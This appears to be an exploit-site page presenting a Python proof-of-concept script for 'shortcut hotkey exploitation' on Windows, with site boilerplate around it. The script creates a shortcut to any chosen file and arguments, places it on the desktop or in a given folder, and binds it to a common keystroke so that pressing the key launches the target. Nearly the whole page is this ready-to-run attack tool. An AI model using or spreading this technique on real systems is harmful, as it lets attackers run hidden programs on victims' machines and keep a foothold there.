Registershortcut hotkey exploitation paper (hebrew)
▸▸▸ Exploit & Vulnerability >> papers exploit & windows vulnerability
Online Vulnerability Scanner Tools
Code...
# Written by Ido Veltzman # # Imports from __future__ import print_function from sys import version_info from os import makedirs from os.path import join, isfile, isdir import winshell # Fixing the program so it will work for both python 2 and python 3. if version_info.major == 2: input = raw_input # Constants SPECIALS = {"N0": 96, "N1": 97, "N2": 98, "N3": 99, "N4": 100, "N5": 101, "N6": 102, "N7": 103, "N8": 104, "N9": 105, "Ndel": 110, "Pup": 2081, "Pdown": 2082, "Home": 2084, "End": 2083, "Insert": 2093, "Numlock": 2192, "Capslock": 20, "Space": 32, "Shift": 256, "Ctrl": 512, "Alt": 1024, "Delete": 127, "Up": 2086, "Down": 2088, "Left": 2085, "Right": 2087} HOTKEY = 90 DESCRIPTION = """ Shortcut Hotkey Exploitation POC Press enter to apply default option whenever a default option is supplied. Possible hotkey special characters: N0-9: Numpad 0-9. Ndel: Numpad del. Pup / Pdown: Page Up / Page Down. Home, End, Insert, Numlock, Down, Left, Right, Shift, Space, Capslock.\n """ def create_shortcut(shortcut_name, target, arguments=None, shortcut_path=None, description=None, hotkey=HOTKEY): """ Creating shortcut with given parameters. :param shortcut_name: Shortcut's name. :param target: Shortcut's target file. :param arguments: Arguments for the target file. :param shortcut_path: Where the shortcut will be created. Default is on the desktop. :param description: Shortcut description. Default is nothing. :param hotkey: Assign a key to the shortcut file. Default is the constant HOTKEY (defined above). """ # Checking if the path exists and if not creating it. If there's no path choosing default. if shortcut_path: # Validation check. if isdir(shortcut_path): shortcut = winshell.shortcut(join(shortcut_path, shortcut_name)) else: print("[!] It appears that the directory {} not exists!".format(shortcut_path)) print("[+] Creating {}".format(shortcut_path)) makedirs(shortcut_path) shortcut = winshell.shortcut(join(shortcut_path, shortcut_name)) else: shortcut = winshell.shortcut(join(winshell.desktop(), shortcut_name)) # Validation check and setting up target file. if isfile(target): shortcut.path = target else: print("[!] The file {} doesn't exists. Please run again this program with valid file.".format(target)) return # Appending description if exists. if description: shortcut.description = description # Adding arguments if exists. if arguments: shortcut.arguments = arguments # Assigning hotkey. shortcut.hotkey = ord(hotkey.upper()) # Creating the shortcut. shortcut.write() def main(): print(DESCRIPTION) shortcut_name = input("[*] Enter shortcut name\n> ") shortcut_target = input("\n[*] Enter target file path\n> ") shortcut_args = input("\n[*] Enter target file arguments (Default is nothing)\n> ") shortcut_path = input("\n[*] Enter shortcut path (Default is your desktop)\n> ") shortcut_desc = input("\n[*] Enter shortcut description (Default is nothing)\n> ") shortcut_hotkey = input("\n[*] Enter shortcut trigger key (Default in this program is: {})\n> ".format(chr(HOTKEY))) # Checking if the user entered a special hotkey or regular. if len(shortcut_hotkey) > 1: shortcut_hotkey = chr(SPECIALS[shortcut_hotkey]) elif not shortcut_hotkey: shortcut_hotkey = chr(HOTKEY) # Creating shortcut. create_shortcut(shortcut_name, shortcut_target, shortcut_args, shortcut_path, shortcut_desc, shortcut_hotkey) print("[+] Shortcut successfuly created.") if __name__ == "__main__": main()
Shortcut hotkey exploitation paper (hebrew) Vulnerability / Exploit Source : Shortcut hotkey exploitation paper (hebrew)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes